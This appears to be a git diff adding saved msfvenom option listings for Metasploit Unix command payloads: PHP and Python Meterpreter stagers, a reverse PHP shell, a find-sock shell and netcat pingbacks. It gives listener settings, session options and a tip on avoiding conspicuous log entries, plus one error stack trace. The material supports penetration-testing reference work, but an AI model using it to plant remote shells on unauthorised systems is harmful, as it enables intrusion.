@@ -0,0 +1,59 @@ + + Name: PHP Exec, PHP Meterpreter, Bind TCP Stager with UUID Support + Module: payload/cmd/unix/php/meterpreter/bind_tcp_uuid + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 858 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in PHP. + + Listen for a connection with UUID Support + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value 
for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-unix-php-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..9e8fdf5 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,65 @@ + + Name: PHP Exec, PHP Meterpreter, PHP Reverse TCP Stager + Module: payload/cmd/unix/php/meterpreter/reverse_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 825 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in PHP. + + Reverse PHP connect back stager with checks for disabled functions + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string 
representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-php-meterpreter-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-unix-php-meterpreter-reverse_tcp_uuid.txt new file mode 100644 index 0000000..a150099 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-meterpreter-reverse_tcp_uuid.txt 
@@ -0,0 +1,66 @@ + + Name: PHP Exec, PHP Meterpreter, PHP Reverse TCP Stager + Module: payload/cmd/unix/php/meterpreter/reverse_tcp_uuid + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 820 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in PHP. + + Reverse PHP connect back stager with checks for disabled functions + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A 
hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-php-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-unix-php-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..5c774da --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,55 @@ + + Name: PHP Exec + Module: payload/cmd/unix/php/meterpreter_reverse_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 10989 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register 
generated UUIDs + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-reverse_php.txt b/msfvenom/payload_options/cmd-unix-php-reverse_php.txt new file mode 100644 index 0000000..c990b8d --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-reverse_php.txt 
@@ -0,0 +1,42 @@ + + Name: PHP Exec, PHP Command Shell, Reverse TCP (via PHP) + Module: payload/cmd/unix/php/reverse_php + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 1342 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Reverse PHP connect back shell with checks for disabled functions + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-shell_findsock.txt b/msfvenom/payload_options/cmd-unix-php-shell_findsock.txt new file mode 100644 index 0000000..39976c5 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-unix-php-shell_findsock.txt @@ -0,0 +1,40 @@ + + Name: PHP Exec, PHP Command Shell, Find Sock + Module: payload/cmd/unix/php/shell_findsock + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 1102 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Spawn a shell on the established connection to + the webserver. Unfortunately, this payload + can leave conspicuous evil-looking entries in the + apache error logs, so it is probably a good idea + to use a bind or reverse shell unless firewalls + prevent them from working. The issue this + payload takes advantage of (CLOEXEC flag not set + on sockets) appears to have been patched on the + Ubuntu version of Apache and may not work on + other Debian-based distributions. Only tested on + Apache but it might work on other web servers + that leak file descriptors to child processes. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-pingback_bind.txt b/msfvenom/payload_options/cmd-unix-pingback_bind.txt new file mode 100644 index 0000000..24afd87 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-pingback_bind.txt 
@@ -0,0 +1,30 @@ + + Name: Unix Command Shell, Pingback Bind TCP (via netcat) + Module: payload/cmd/unix/pingback_bind + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 103 + Rank: Normal + +Provided by: + asoto-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Accept a connection, send a UUID, then exit + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + NetcatPath nc yes The path to the Netcat executable + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-pingback_reverse.txt b/msfvenom/payload_options/cmd-unix-pingback_reverse.txt new file mode 100644 index 0000000..3608983 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-pingback_reverse.txt 
@@ -0,0 +1,37 @@ + + Name: Unix Command Shell, Pingback Reverse TCP (via netcat) + Module: payload/cmd/unix/pingback_reverse + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 84 + Rank: Normal + +Provided by: + asoto-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates a socket, send a UUID, then exit + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + NetcatPath nc yes The path to the Netcat executable + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-exec.txt b/msfvenom/payload_options/cmd-unix-python-exec.txt new file mode 100644 index 0000000..8d378c3 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-exec.txt 
@@ -0,0 +1,10 @@ +Options for payload/cmd/unix/python/exec: +========================= + +/usr/share/metasploit-framework/modules/payloads/singles/python/exec.rb:39:in `command_string': undefined method `include?' for nil (NoMethodError) + from /usr/share/metasploit-framework/modules/payloads/singles/python/exec.rb:32:in `generate' + from /usr/share/metasploit-framework/modules/payloads/adapters/cmd/unix/python.rb:34:in `generate' + from /usr/share/metasploit-framework/lib/msf/core/payload.rb:195:in `size' + from /usr/share/metasploit-framework/lib/msf/base/serializer/readable_text.rb:500:in `dump_payload_module' + from /usr/share/metasploit-framework/lib/msf/base/serializer/readable_text.rb:26:in `dump_module' + from /usr/bin/msfvenom:461:in `
' diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..d601db6 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter-bind_tcp.txt 
@@ -0,0 +1,60 @@ + + Name: Python Exec, Python Meterpreter, Python Bind TCP Stager + Module: payload/cmd/unix/python/meterpreter/bind_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 482 + Rank: Normal + +Provided by: + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the 
functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter-bind_tcp_uuid.txt new file mode 100644 index 0000000..5eed562 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter-bind_tcp_uuid.txt 
@@ -0,0 +1,61 @@ + + Name: Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support + Module: payload/cmd/unix/python/meterpreter/bind_tcp_uuid + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 545 + Rank: Normal + +Provided by: + Spencer McIntyre + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). + + Listen for a connection with UUID Support + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + 
MeterpreterTryToFork true no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_http.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_http.txt new file mode 100644 index 0000000..ab6e3ac --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_http.txt 
@@ -0,0 +1,74 @@ + + Name: Python Exec, Python Meterpreter, Python Reverse HTTP Stager + Module: payload/cmd/unix/python/meterpreter/reverse_http + Platform: Unix + Arch: cmd +Needs Admin: No + +Evasion options for payload/cmd/unix/python/meterpreter/reverse_http: +========================= + +ent Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). + + Tunnel communication over HTTP + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in 
response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies 
specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_https.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_https.txt new file mode 100644 index 0000000..9fb0833 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_https.txt 
@@ -0,0 +1,76 @@ + + Name: Python Exec, Python Meterpreter, Python Reverse HTTPS Stager + Module: payload/cmd/unix/python/meterpreter/reverse_https + Platform: Unix + Arch: cmd +Needs Admin: No + +Evasion options for payload/cmd/unix/python/meterpreter/reverse_https: +========================= + +nt Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). + + Tunnel communication over HTTP using SSL + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler 
will send in response to requests + HttpUnknownRequestResponse

It works!

